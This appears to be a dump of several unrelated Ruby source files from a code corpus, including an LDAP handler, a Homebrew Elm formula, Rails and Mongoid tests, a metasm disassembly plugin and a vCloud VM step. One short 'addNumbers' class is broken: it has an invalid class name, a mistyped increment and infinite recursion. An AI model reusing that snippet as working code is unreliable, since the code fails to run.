    user_dn = user_entries.first.dn

    # Resolve each requested group name to its directory entry (nil when
    # the group could not be found).
    groups = @group_names.inject({}) do |hash, group_name|
      # Initialize the group name
      hash[group_name] = nil
      # Build a filter to retrieve the group entries
      filter = Net::LDAP::Filter.eq( "objectclass", "group" ) & Net::LDAP::Filter.eq( "cn", group_name )
      # Search for each of the groups
      @ldap.search(
        :base => "#{@info_values['base']}",
        :filter => filter,
        :return_result => false
      ) {|entry| hash[group_name] = entry }
      # Return the hash to be used with the remaining inject calls
      hash
    end

    # Determine if there were any missing groups.
    # FIX(review): the missing-group check now runs *before* any debug
    # logging of group DNs; previously an identical debug block executed
    # first and called `group.dn` on nil entries, crashing in debug mode.
    # Also removed an unused `missing_group_names` local that duplicated
    # this computation.
    missing_groups = Hash[groups.select {|key, value| value.nil?}]
    # If there was at least 1 missing group
    if missing_groups.length > 0
      # Raise an error
      raise "Unable to locate the following groups: #{missing_groups.keys.join(', ')}"
    end

    # If debug logging is enabled
    if @debug_logging_enabled
      # Log the retrieved group information
      puts "Retrieved Groups:"
      groups.each do |name, group|
        puts "  #{name}: #{group.dn}"
      end
    end

    # Initialize any errors that occurred
    errors = {}
    # For each of the groups
    groups.each do |name, entry|
      # Attempt to remove the user from the group
      @ldap.modify(:dn => entry.dn, :operations => [[:delete, :member, [user_dn]]])
      # Log the results
      puts "Result for #{name}: #{@ldap.get_operation_result.message}" if @debug_logging_enabled
      # Add an error for the group name if the query was not successful
      unless @ldap.get_operation_result.code == 0
        errors.merge!(name => @ldap.get_operation_result.error_message)
      end
    end

    # If there were any errors
    if errors.length > 0
      # Initialize the error message string
      error_string = "There were problems removing the computer with a " <<
        "#{@parameters['search_by']} of #{@parameters['search_value']} from " <<
        "the following groups: #{errors.keys.join(', ')}"
      # Add a specific error message for each of the failed groups
      errors.each do |group_name, error|
        error_string << "\n  #{groups[group_name].dn}: #{error.to_s.inspect}"
      end
      # Add in a list of groups successfully removed
      error_string << "\n  The following groups were successfully removed: " <<
        "#{(@group_names - errors.keys).join(', ')}"
      # Raise the exception
      raise error_string
    end
  # If authentication of the ldap session failed
  else
    # Raise an error
    raise "Directory authentication failed for #{@info_values['host']}: #{@ldap.get_operation_result}"
  end

  # Build, log, and return the results
  results = '<results/>'
  puts("Results: \n#{results}") if @debug_logging_enabled
  return results
end
##############################################################################
# General handler utility functions
##############################################################################
# Escapes characters that have special meaning in XML (&, ", <, and >) so
# that handler result values can be embedded safely in the returned XML
# document. Returns nil when the value is nil (or false), preserving the
# original guard behaviour. This method is not necessary if values do not
# contain characters with special meaning in XML, however it is a good
# practice to use it for all return variable results in case the value
# could include one of those characters in the future. This method can be
# copied and reused between handlers.
def escape(string)
  # Globally replace characters based on the ESCAPE_CHARACTERS constant
  string.to_s.gsub(/[&"><]/) { |special| ESCAPE_CHARACTERS[special] } if string
end

# Maps each XML special character to its escaped entity.
# FIX(review): the previous mapping replaced each character with itself
# (an HTML-entity-decoding corruption), which made escape a no-op and
# allowed invalid XML into the results.
ESCAPE_CHARACTERS = {'&' => '&amp;', '>' => '&gt;', '<' => '&lt;', '"' => '&quot;'}.freeze
end | 41.03125 | 118 | 0.64215 |
5d6cb227030c3e260e284305255f9bfd5429f867 | 2,296 | require "language/haskell"
class Elm < Formula
include Language::Haskell::Cabal
desc "Functional programming language for building browser-based GUIs"
homepage "https://elm-lang.org"
url "https://github.com/elm/compiler/archive/0.19.1.tar.gz"
sha256 "aa161caca775cef1bbb04bcdeb4471d3aabcf87b6d9d9d5b0d62d3052e8250b1"
bottle do
sha256 "e1bbfe4ff7deba3ed60eb55b81b86b6d3346325bea584802ca1212369f0fa0bb" => :catalina
sha256 "288eeb47caccfaa9bae220492cee8de7206d40b7760e1e309a139a2398f9710d" => :mojave
sha256 "7fb65ff925701c39bbc7d9a5099cd88f10a56949ae019bc8817035ed1d56edbd" => :high_sierra
sha256 "1e9cbf0cacc21654787824f241af953966ff9f6df2d8218413962ded9bbfa139" => :x86_64_linux
end
depends_on "cabal-install" => :build
depends_on "[email protected]" => :build
uses_from_macos "ncurses"
uses_from_macos "zlib"
def install
# elm-compiler needs to be staged in a subdirectory for the build process to succeed
(buildpath/"elm-compiler").install Dir["*"]
cabal_sandbox do
cabal_sandbox_add_source "elm-compiler"
cabal_install "--only-dependencies", "--force-reinstalls", "elm"
cabal_install "--prefix=#{prefix}", "elm"
end
end
test do
# create elm.json
elm_json_path = testpath/"elm.json"
elm_json_path.write <<~EOS
{
"type": "application",
"source-directories": [
"."
],
"elm-version": "0.19.1",
"dependencies": {
"direct": {
"elm/browser": "1.0.0",
"elm/core": "1.0.0",
"elm/html": "1.0.0"
},
"indirect": {
"elm/json": "1.0.0",
"elm/time": "1.0.0",
"elm/url": "1.0.0",
"elm/virtual-dom": "1.0.0"
}
},
"test-dependencies": {
"direct": {},
"indirect": {}
}
}
EOS
src_path = testpath/"Hello.elm"
src_path.write <<~EOS
module Hello exposing (main)
import Html exposing (text)
main = text "Hello, world!"
EOS
out_path = testpath/"index.html"
system bin/"elm", "make", src_path, "--output=#{out_path}"
assert_predicate out_path, :exist?
end
end
| 29.818182 | 94 | 0.597125 |
1c554d255b0066200fca5362b4df3bc33b69cf11 | 370 | # frozen_string_literal: true
require 'rails_helper'
describe PublishChannel do
subject { described_class.new(uri) }
context "with a vocab term" do
# Resolving a known publish-channel vocabulary URI must expose both the
# canonical URI and its preferred label.
let(:uri) { AICPublishChannel.TrustedParty }
its(:uri) { is_expected.to eq("http://definitions.artic.edu/publish_channel/TrustedParty") }
its(:pref_label) { is_expected.to eq("Trusted Party") }
end
end
| 28.461538 | 96 | 0.732432 |
61d7c7ecced53ca3841205d9cef61aef6893e7be | 3,034 | require File.expand_path('../boot', __FILE__)
require 'csv'
require 'rails/all'
if defined?(Bundler)
# If you precompile assets before deploying to production, use this line
Bundler.require(*Rails.groups(:assets => %w(development test)))
# If you want your assets lazily compiled in production, use this line
# Bundler.require(:default, :assets, Rails.env)
end
# Rails 3.x application configuration for VeritasWeb.
module VeritasWeb
  class Application < Rails::Application
    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration should go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded.

    # Custom directories with classes and modules you want to be autoloadable.
    config.autoload_paths += %W(#{config.root}/lib)
    config.autoload_paths += %W(#{config.root}/app/models/ckeditor)

    # Only load the plugins named here, in the order given (default is alphabetical).
    # :all can be used as a placeholder for all plugins not explicitly named.
    # config.plugins = [ :exception_notification, :ssl_requirement, :all ]

    # Activate observers that should always be running.
    # config.active_record.observers = :cacher, :garbage_collector, :forum_observer

    # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
    # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
    # config.time_zone = 'Central Time (US & Canada)'

    # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
    # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
    # config.i18n.default_locale = :de

    # Configure the default encoding used in templates for Ruby 1.9.
    config.encoding = "utf-8"

    # Configure sensitive parameters which will be filtered from the log file.
    config.filter_parameters += [:password]

    # Enable escaping HTML in JSON.
    config.active_support.escape_html_entities_in_json = true

    # Use SQL instead of Active Record's schema dumper when creating the database.
    # This is necessary if your schema can't be completely dumped by the schema dumper,
    # like if you have constraints or database-specific column types
    # config.active_record.schema_format = :sql

    # Enforce whitelist mode for mass assignment.
    # This will create an empty whitelist of attributes available for mass-assignment for all models
    # in your app. As such, your models will need to explicitly whitelist or blacklist accessible
    # parameters by using an attr_accessible or attr_protected declaration.
    config.active_record.whitelist_attributes = true

    # Enable the asset pipeline
    config.assets.enabled = true
    config.assets.initialize_on_precompile = false

    # Version of your assets, change this if you want to expire all your assets
    config.assets.version = '1.0'

    # App-specific setting: base URL for the external carrier-lookup API.
    config.carrier_lookup_api_url = 'http://www.carrierlookup.com/index.php/api/lookup?'
  end
end
| 43.971014 | 100 | 0.735662 |
e8070b83409369b320c916752f5ce78e06af14af | 184 | FactoryGirl.define do
# Builds a FIDE rating linked to a generated fide_player: random rating in
# 1..2500, a fixed rating-list date, and a random games count in 0..29.
factory :fide_rating do
  association :fide_player
  rating { 1 + rand(2500) }
  list "2011-11-01"
  games { rand(30) }
end
end
| 20.444444 | 35 | 0.570652 |
2604a85b96bd5ee8bb4907d67400f413bb215b5f | 892 | module Hippo_eyeDoc::TransactionSets
module HIPAA_999
  # Loop 2110 AK2 of a HIPAA 999 (Implementation Acknowledgment) transaction
  # set: carries per-element error detail (IK4) plus optional context (CTX).
  class L2110AK2 < Hippo_eyeDoc::TransactionSets::Base
    loop_name 'L2110AK2' #Implementation Data Element Note

    #Implementation Data Element Note
    segment Hippo_eyeDoc::Segments::IK4,
            :name => 'Implementation Data Element Note',
            :minimum => 0,
            :maximum => 1,
            :position => 600,
            :identified_by => {
              'IK403' => ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "12", "13", "I10", "I11", "I12", "I13", "I6", "I9"]
            }

    #Element Context
    segment Hippo_eyeDoc::Segments::CTX,
            :name => 'Element Context',
            :minimum => 0,
            :maximum => 10,
            :position => 700
  end
end
| 33.037037 | 132 | 0.454036 |
module VCloudCloud
  module Steps
    # Reconfigures an existing vCloud VM: display name, description,
    # CPU/RAM/disk sizing and NIC layout. Expects state[:vapp] and
    # state[:vm] to already hold the target entities.
    class ReconfigureVM < Step
      # name          - new VM name (String, skipped when nil)
      # description   - new VM description (String, skipped when nil)
      # resource_pool - hash with 'cpu', 'ram' and 'disk' values (skipped when nil)
      # networks      - network settings keyed by network name (skipped when nil)
      def perform(name, description, resource_pool, networks, &block)
        # Refresh both entities so we operate on current vCloud state.
        state[:vapp] = client.reload state[:vapp]
        vm = state[:vm] = client.reload state[:vm]

        vm.name = name unless name.nil?
        vm.description = description unless description.nil?

        unless resource_pool.nil?
          vm.change_cpu_count Integer(resource_pool['cpu'])
          vm.change_memory Integer(resource_pool['ram'])
          vm.add_hard_disk Integer(resource_pool['disk'])
        end

        unless networks.nil?
          # Rebuild the NIC list from scratch, one manually-addressed NIC
          # per configured network.
          vm.delete_nic(*vm.hardware_section.nics)
          networks.values.each_with_index do |network, nic_index|
            # FIX: distinct local so the +name+ parameter is not shadowed.
            network_name = network['cloud_properties']['name']
            vm.add_nic nic_index, network_name, VCloudSdk::Xml::IP_ADDRESSING_MODE[:MANUAL], network['ip']
            vm.connect_nic nic_index, network_name, VCloudSdk::Xml::IP_ADDRESSING_MODE[:MANUAL], network['ip']
          end
        end

        # Apply all changes in a single reconfigure call and wait for the task.
        client.invoke_and_wait :post, vm.reconfigure_link,
                               :payload => vm,
                               :headers => { :content_type => VCloudSdk::Xml::MEDIA_TYPE[:VM] }
        state[:vm] = client.reload vm
      end
    end
  end
end
| 34.361111 | 102 | 0.625707 |
bb375076c67c581df7637af1f33c6454207b0e79 | 6,149 | # encoding: utf-8
require 'abstract_unit'
require 'action_view/dependency_tracker'
# Fake dependency tracker used by the tests: reports exactly one synthetic
# dependency derived from the template name and ignores the template object.
class NeckbeardTracker
  def self.call(name, _template)
    [format("foo/%s", name)]
  end
end
# Minimal stand-in for an ActionView::Template: exposes only the +source+
# and +handler+ readers the dependency trackers inspect.
class FakeTemplate
  attr_reader :source
  attr_reader :handler

  # handler defaults to the Neckbeard fake handler defined alongside.
  def initialize(source, handler = Neckbeard)
    @source = source
    @handler = handler
  end
end
# Fake template handlers registered in the tests below; each one simply
# returns the template's source unchanged.
Neckbeard = lambda {|template| template.source }
Bowtie = lambda {|template| template.source }
# Verifies that DependencyTracker dispatches to the tracker registered for
# a template's handler, and returns [] when no tracker matches.
class DependencyTrackerTest < ActionView::TestCase
  def tracker
    ActionView::DependencyTracker
  end

  def setup
    # Register the fake handler/tracker pair so handler lookups resolve.
    ActionView::Template.register_template_handler :neckbeard, Neckbeard
    tracker.register_tracker(:neckbeard, NeckbeardTracker)
  end

  def teardown
    # Undo registration so other test classes see a clean registry.
    ActionView::Template.unregister_template_handler :neckbeard
    tracker.remove_tracker(:neckbeard)
  end

  def test_finds_tracker_by_template_handler
    template = FakeTemplate.new("boo/hoo")
    dependencies = tracker.find_dependencies("boo/hoo", template)
    assert_equal ["foo/boo/hoo"], dependencies
  end

  def test_returns_empty_array_if_no_tracker_is_found
    # Bowtie has no registered tracker, so no dependencies are reported.
    template = FakeTemplate.new("boo/hoo", Bowtie)
    dependencies = tracker.find_dependencies("boo/hoo", template)
    assert_equal [], dependencies
  end
end
# Exercises ERBTracker's regex-based extraction of render dependencies from
# ERB source: partials, layouts, collections, method chains, odd spacing,
# quoting, and non-ASCII names.
class ERBTrackerTest < Minitest::Test
  def make_tracker(name, template)
    ActionView::DependencyTracker::ERBTracker.new(name, template)
  end

  def test_dependency_of_erb_template_with_number_in_filename
    template = FakeTemplate.new("<%# render 'messages/message123' %>", :erb)
    tracker = make_tracker("messages/_message123", template)

    assert_equal ["messages/message123"], tracker.dependencies
  end

  def test_dependency_of_template_partial_with_layout
    skip # FIXME: Needs to be fixed properly, right now we can only match one dependency per line. Need multiple!
    template = FakeTemplate.new("<%# render partial: 'messages/show', layout: 'messages/layout' %>", :erb)
    tracker = make_tracker("multiple/_dependencies", template)

    assert_equal ["messages/layout", "messages/show"], tracker.dependencies
  end

  def test_dependency_of_template_layout_standalone
    template = FakeTemplate.new("<%# render layout: 'messages/layout' do %>", :erb)
    tracker = make_tracker("messages/layout", template)

    assert_equal ["messages/layout"], tracker.dependencies
  end

  def test_finds_dependency_in_correct_directory
    # render(record) infers the partial path from the record's class.
    template = FakeTemplate.new("<%# render(message.topic) %>", :erb)
    tracker = make_tracker("messages/_message", template)

    assert_equal ["topics/topic"], tracker.dependencies
  end

  def test_finds_dependency_in_correct_directory_with_underscore
    template = FakeTemplate.new("<%# render(message_type.messages) %>", :erb)
    tracker = make_tracker("message_types/_message_type", template)

    assert_equal ["messages/message"], tracker.dependencies
  end

  def test_dependency_of_erb_template_with_no_spaces_after_render
    template = FakeTemplate.new("<%# render'messages/message' %>", :erb)
    tracker = make_tracker("messages/_message", template)

    assert_equal ["messages/message"], tracker.dependencies
  end

  def test_finds_no_dependency_when_render_begins_the_name_of_an_identifier
    # "rendering" must not be mistaken for a render call.
    template = FakeTemplate.new("<%# rendering 'it useless' %>", :erb)
    tracker = make_tracker("resources/_resource", template)

    assert_equal [], tracker.dependencies
  end

  def test_finds_no_dependency_when_render_ends_the_name_of_another_method
    # "surrender" must not be mistaken for a render call either.
    template = FakeTemplate.new("<%# surrender 'to reason' %>", :erb)
    tracker = make_tracker("resources/_resource", template)

    assert_equal [], tracker.dependencies
  end

  def test_finds_dependency_on_multiline_render_calls
    template = FakeTemplate.new("<%#
      render :object => @all_posts,
             :partial => 'posts' %>", :erb)
    tracker = make_tracker("some/_little_posts", template)

    assert_equal ["some/posts"], tracker.dependencies
  end

  def test_finds_multiple_unrelated_odd_dependencies
    template = FakeTemplate.new("
      <%# render('shared/header', title: 'Title') %>
      <h2>Section title</h2>
      <%# render@section %>
    ", :erb)
    tracker = make_tracker("multiple/_dependencies", template)

    assert_equal ["shared/header", "sections/section"], tracker.dependencies
  end

  def test_finds_dependencies_for_all_kinds_of_identifiers
    # Globals, ivars and class variables should all resolve to partials.
    template = FakeTemplate.new("
      <%# render $globals %>
      <%# render @instance_variables %>
      <%# render @@class_variables %>
    ", :erb)
    tracker = make_tracker("identifiers/_all", template)

    assert_equal [
      "globals/global",
      "instance_variables/instance_variable",
      "class_variables/class_variable"
    ], tracker.dependencies
  end

  def test_finds_dependencies_on_method_chains
    # Only the last receiver in the chain determines the partial path.
    template = FakeTemplate.new("<%# render @parent.child.grandchildren %>", :erb)
    tracker = make_tracker("method/_chains", template)

    assert_equal ["grandchildren/grandchild"], tracker.dependencies
  end

  def test_finds_dependencies_with_special_characters
    template = FakeTemplate.new("<%# render @pokémon, partial: 'ピカチュウ' %>", :erb)
    tracker = make_tracker("special/_characters", template)

    assert_equal ["special/ピカチュウ"], tracker.dependencies
  end

  def test_finds_dependencies_with_quotes_within
    template = FakeTemplate.new(%{
      <%# render "single/quote's" %>
      <%# render 'double/quote"s' %>
    }, :erb)
    tracker = make_tracker("quotes/_single_and_double", template)

    assert_equal ["single/quote's", 'double/quote"s'], tracker.dependencies
  end

  def test_finds_dependencies_with_extra_spaces
    template = FakeTemplate.new(%{
      <%= render "header" %>
      <%= render partial: "form" %>
      <%= render @message %>
      <%= render ( @message.events ) %>
      <%= render :collection => @message.comments,
                 :partial => "comments/comment" %>
    }, :erb)
    tracker = make_tracker("spaces/_extra", template)

    assert_equal [
      "spaces/header",
      "spaces/form",
      "messages/message",
      "events/event",
      "comments/comment"
    ], tracker.dependencies
  end
end
| 31.213198 | 113 | 0.713612 |
2185a876752a469fef8603333fc972065add1f55 | 2,042 | # This file is part of Metasm, the Ruby assembly manipulation suite
# Copyright (C) 2006-2009 Yoann GUILLOT
#
# Licence is LGPL, see LICENCE in the top-level directory
# metasm dasm plugin: retrieve a section section, and disassemble everything it can, skipping existing code and nops
# usage: load the plugin, then call (ruby snipped): dasm.dasm_all_section '.text'
# Disassembles every byte in [addrstart, addrstart+length): skips bytes that
# are already decoded, skips padding-like instructions (nop / self-lea /
# self-mov / int 3), and disassembles everything else via +method+. A second
# pass then promotes decoded block heads with no incoming control flow to
# standalone "orphan" functions.
def dasm_all(addrstart, length, method=:disassemble_fast_deep)
  s = get_section_at(addrstart)
  return if not s
  s = s[0]
  boff = s.ptr
  off = 0
  # Pass 1: walk the range and disassemble anything not yet decoded.
  while off < length
    if di = di_at(addrstart + off)
      # Already decoded: jump over the whole instruction.
      off += di.bin_length
    elsif @decoded[addrstart+off]
      # Decoded as something other than an instruction (e.g. data): step one byte.
      off += 1
    else
      s.ptr = boff+off
      maydi = cpu.decode_instruction(s, 0)
      if not maydi
        off += 1
      elsif maydi.instruction.to_s =~ /nop|lea (.*), \[\1(?:\+0)?\]|mov (.*), \2|int 3/
        # Looks like padding/alignment filler: skip without disassembling.
        off += maydi.bin_length
      else
        puts "dasm_all: found #{Expression[addrstart+off]}" if $VERBOSE
        send(method, addrstart+off)
      end
    end
    # Keep the GUI responsive during long scans.
    Gui.main_iter if gui and off & 15 == 0
  end
  count = 0
  off = 0
  # Pass 2: any block head with no callers/predecessors becomes an orphan function.
  while off < length
    addr = addrstart+off
    if di = di_at(addr)
      if di.block_head?
        b = di.block
        if not @function[addr] and b.from_subfuncret.to_a.empty? and b.from_normal.to_a.empty?
          l = auto_label_at(addr, 'sub_orph')
          puts "dasm_all: found orphan function #{l}"
          @function[addrstart+off] = DecodedFunction.new
          @function[addrstart+off].finalized = true
          detect_function_thunk(addr)
          count += 1
        end
      end
      off += di.bin_length
    else
      off += 1
    end
    Gui.main_iter if gui and off & 15 == 0
  end
  puts "found #{count} orphan functions" if $VERBOSE
  gui.gui_update if gui
end
# Runs dasm_all over every section whose name matches +name+.
# Always returns true.
def dasm_all_section(name, method=:disassemble_fast_deep)
  section_info.each do |sec_name, sec_addr, sec_len, _info|
    next unless sec_name == name
    dasm_all(Expression[sec_addr].reduce, sec_len, method)
  end
  true
end
| 28.760563 | 117 | 0.604799 |
e8ea6a5394b322d017f2b61a4a88fbda2e65a325 | 1,747 | class UsersController < ApplicationController
# Load @user before all member actions.
before_action :set_user, only: %i[show edit update destroy]

# GET /users
# GET /users.json
def index
  @users = User.all
end

# GET /users/1
# GET /users/1.json
# @user is provided by the set_user before_action.
def show; end

# GET /users/new
def new
  @user = User.new
end

# GET /users/1/edit
# @user is provided by the set_user before_action.
def edit; end
# POST /users
# POST /users.json
# Creates a user from the permitted params; re-renders the form with
# validation errors on failure.
def create
  @user = User.new(user_params)

  respond_to do |format|
    if @user.save
      format.html { redirect_to @user, notice: notice_m('created') }
      format.json { render :show, status: :created, location: @user }
    else
      format.html { render :new }
      format.json { render json: @user.errors, status: :unprocessable_entity }
    end
  end
end

# PATCH/PUT /users/1
# PATCH/PUT /users/1.json
# Updates @user with the permitted params; re-renders the edit form with
# validation errors on failure.
def update
  respond_to do |format|
    if @user.update(user_params)
      format.html { redirect_to @user, notice: notice_m('edited') }
      format.json { render :show, status: :ok, location: @user }
    else
      format.html { render :edit }
      format.json { render json: @user.errors, status: :unprocessable_entity }
    end
  end
end
# DELETE /users/1
# DELETE /users/1.json
# Destroys @user (loaded by set_user) and redirects to the index.
def destroy
  @user.destroy
  respond_to do |format|
    # FIX: notice previously read "destoyed" (typo).
    format.html { redirect_to users_url, notice: notice_m('destroyed') }
    format.json { head :no_content }
  end
end
private
# Builds the flash notice for a successful action, e.g.
# notice_m('created') => "User was successfully created".
def notice_m(word)
  # Interpolation instead of string concatenation (idiomatic Ruby).
  "User was successfully #{word}"
end
# Use callbacks to share common setup or constraints between actions.
# Raises ActiveRecord::RecordNotFound for unknown ids.
def set_user
  @user = User.find(params[:id])
end

# Only allow a list of trusted parameters through.
def user_params
  params.require(:user).permit(:name, :email)
end
end
| 22.397436 | 80 | 0.637092 |
9149d9401e9ee27a741b023707251e7fcbcbd5da | 2,442 | require "spec_helper"
describe Mongoid::Timestamps do

  # Including the module should add created_at/updated_at fields and keep
  # them in UTC, equal to each other on brand-new records.
  describe ".included" do

    let(:document) do
      Dokument.new
    end

    let(:fields) do
      Dokument.fields
    end

    before do
      # Fire the persistence callbacks without touching the database.
      document.run_callbacks(:create)
      document.run_callbacks(:save)
    end

    it "adds created_at to the document" do
      expect(fields["created_at"]).to_not be_nil
    end

    it "adds updated_at to the document" do
      expect(fields["updated_at"]).to_not be_nil
    end

    it "forces the created_at timestamps to UTC" do
      expect(document.created_at).to be_within(10).of(Time.now.utc)
    end

    it "forces the updated_at timestamps to UTC" do
      expect(document.updated_at).to be_within(10).of(Time.now.utc)
    end

    it "ensures created_at equals updated_at on new records" do
      expect(document.updated_at).to eq(document.created_at)
    end

    pending "includes a record_timestamps class_accessor to ease AR compatibility" do
      expect(Dokument.new).to respond_to(:record_timestamps)
    end
  end

  context "when the document has not changed" do

    let(:document) do
      Dokument.instantiate(Dokument.new.attributes)
    end

    before do
      document.new_record = false
    end

    it "does not run the update callbacks" do
      document.should_receive(:updated_at=).never
      document.save
    end
  end

  context "when the document has changed with updated_at specified" do

    let(:document) do
      Dokument.new(created_at: Time.now.utc)
    end

    before do
      document.new_record = false
      # Manually pinned updated_at must be preserved on save.
      document.updated_at = DateTime.parse("2001-06-12")
    end

    it "does not set updated at" do
      document.should_receive(:updated_at=).never
      document.save
    end
  end

  context "when the document is created" do

    let!(:document) do
      Dokument.create
    end

    it "runs the update callbacks" do
      expect(document.updated_at).to eq(document.created_at)
    end
  end

  context "when only embedded documents have changed" do

    let!(:document) do
      Dokument.create(updated_at: 2.days.ago)
    end

    let!(:address) do
      document.addresses.create(street: "Karl Marx Strasse")
    end

    let!(:updated_at) do
      document.updated_at
    end

    before do
      address.number = 1
      document.save
    end

    it "updates the root document updated at" do
      expect(document.updated_at).to be_within(1).of(Time.now)
    end
  end
end
| 21.610619 | 85 | 0.67199 |
# Tiny demo class that prints numbers to stdout.
#
# Fixes from review: the original `class addNumbers` does not parse (a class
# name must be a constant); `x =+ 1` assigned +1 rather than incrementing;
# and `five` recursed into itself forever while also referencing an
# undefined `x`. The intent of `five` is presumably "print 1 five times" —
# TODO confirm against the author's intent.
class AddNumbers
  # Prints the number 1 followed by a newline.
  def self.one
    x = 1
    puts x
  end

  # Prints 1 five times by invoking .one repeatedly.
  def self.five
    5.times { one }
  end
end
| 11.25 | 34 | 0.607407 |
113199085fed230420561d1becf10833fc2237d6 | 14,416 | #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# Copyright (c) 2016, Electric Power Research Institute (EPRI)
# All rights reserved.
#
# OpenADR ("this software") is licensed under BSD 3-Clause license.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of EPRI nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
#
# This EPRI software incorporates work covered by the following copyright and permission
# notices. You may not use these works except in compliance with their respective
# licenses, which are provided below.
#
# These works are provided by the copyright holders and contributors "as is" and any express or
# implied warranties, including, but not limited to, the implied warranties of merchantability
# and fitness for a particular purpose are disclaimed.
#
#########################################################################################
# MIT Licensed Libraries
#########################################################################################
#
# * actionmailer 3.2.12 (http://www.rubyonrails.org) - Email composition, delivery, and receiving framework (part of Rails).
# * actionpack 3.2.12 (http://www.rubyonrails.org) - Web-flow and rendering framework putting the VC in MVC (part of Rails).
# * activemodel 3.2.12 (http://www.rubyonrails.org) - A toolkit for building modeling frameworks (part of Rails).
# * activerecord 3.2.12 (http://www.rubyonrails.org) - Object-relational mapper framework (part of Rails).
# * activeresource 3.2.12 (http://www.rubyonrails.org) - REST modeling framework (part of Rails).
# * activesupport 3.2.12 (http://www.rubyonrails.org) - A toolkit of support libraries and Ruby core extensions extracted from the Rails framework.
# * arel 3.0.2 (http://github.com/rails/arel) - Arel is a SQL AST manager for Ruby
# * bootstrap-sass 3.1.1.0 (https://github.com/twbs/bootstrap-sass) - Twitter's Bootstrap, converted to Sass and ready to drop into Rails or Compass
# * builder 3.0.4 (http://onestepback.org) - Builders for MarkUp.
# * bundler 1.12.5 (http://bundler.io) - The best way to manage your application's dependencies
# * capybara 2.4.4 (http://github.com/jnicklas/capybara) - Capybara aims to simplify the process of integration testing Rack applications, such as Rails, Sinatra or Merb
# * coffee-rails 3.2.2 () - Coffee Script adapter for the Rails asset pipeline.
# * coffee-script-source 1.6.3 (http://jashkenas.github.com/coffee-script/) - The CoffeeScript Compiler
# * docile 1.1.5 (https://ms-ati.github.io/docile/) - Docile keeps your Ruby DSLs tame and well-behaved
# * edn 1.0.0 () - 'edn implements a reader for Extensible Data Notation by Rich Hickey.'
# * erubis 2.7.0 (http://www.kuwata-lab.com/erubis/) - a fast and extensible eRuby implementation which supports multi-language
# * execjs 1.4.0 (https://github.com/sstephenson/execjs) - Run JavaScript code from Ruby
# * factory_girl 4.5.0 (https://github.com/thoughtbot/factory_girl) - factory_girl provides a framework and DSL for defining and using model instance factories.
# * factory_girl_rails 4.5.0 (http://github.com/thoughtbot/factory_girl_rails) - factory_girl_rails provides integration between factory_girl and rails 3
# * gem-licenses 0.1.2 (http://github.com/dblock/gem-licenses) - List all gem licenses.
# * hike 1.2.3 (http://github.com/sstephenson/hike) - Find files in a set of paths
# * i18n 0.6.5 (http://github.com/svenfuchs/i18n) - New wave Internationalization support for Ruby
# * jdbc-postgresql 9.2.1000 (https://github.com/rosenfeld/jdbc-postgresql) - PostgresSQL jdbc driver for JRuby
# * journey 1.0.4 (http://github.com/rails/journey) - Journey is a router
# * jquery-rails 3.0.4 (http://rubygems.org/gems/jquery-rails) - Use jQuery with Rails 3
# * json-schema 2.6.2 (http://github.com/ruby-json-schema/json-schema/tree/master) - Ruby JSON Schema Validator
# * mail 2.4.4 (http://github.com/mikel/mail) - Mail provides a nice Ruby DSL for making, sending and reading emails.
# * metaclass 0.0.4 (http://github.com/floehopper/metaclass) - Adds a metaclass method to all Ruby objects
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
# * mocha 1.1.0 (http://gofreerange.com/mocha/docs) - Mocking and stubbing library
# * multi_json 1.7.9 (http://github.com/intridea/multi_json) - A common interface to multiple JSON libraries.
# * nokogiri 1.6.5 (http://nokogiri.org) - Nokogiri (鋸) is an HTML, XML, SAX, and Reader parser
# * polyglot 0.3.3 (http://github.com/cjheath/polyglot) - Augment 'require' to load non-Ruby file types
# * rack-test 0.6.2 (http://github.com/brynary/rack-test) - Simple testing API built on Rack
# * railties 3.2.12 (http://www.rubyonrails.org) - Tools for creating, working with, and running Rails applications.
# * rake 10.1.0 (http://rake.rubyforge.org) - Ruby based make-like utility.
# * rspec-core 2.14.3 (http://github.com/rspec/rspec-core) - rspec-core-2.14.3
# * rspec-expectations 2.14.0 (http://github.com/rspec/rspec-expectations) - rspec-expectations-2.14.0
# * rspec-mocks 2.14.1 (http://github.com/rspec/rspec-mocks) - rspec-mocks-2.14.1
# * rspec-rails 2.14.0 (http://github.com/rspec/rspec-rails) - rspec-rails-2.14.0
# * sass 3.2.9 (http://sass-lang.com/) - A powerful but elegant CSS compiler that makes CSS fun again.
# * sass-rails 3.2.6 () - Sass adapter for the Rails asset pipeline.
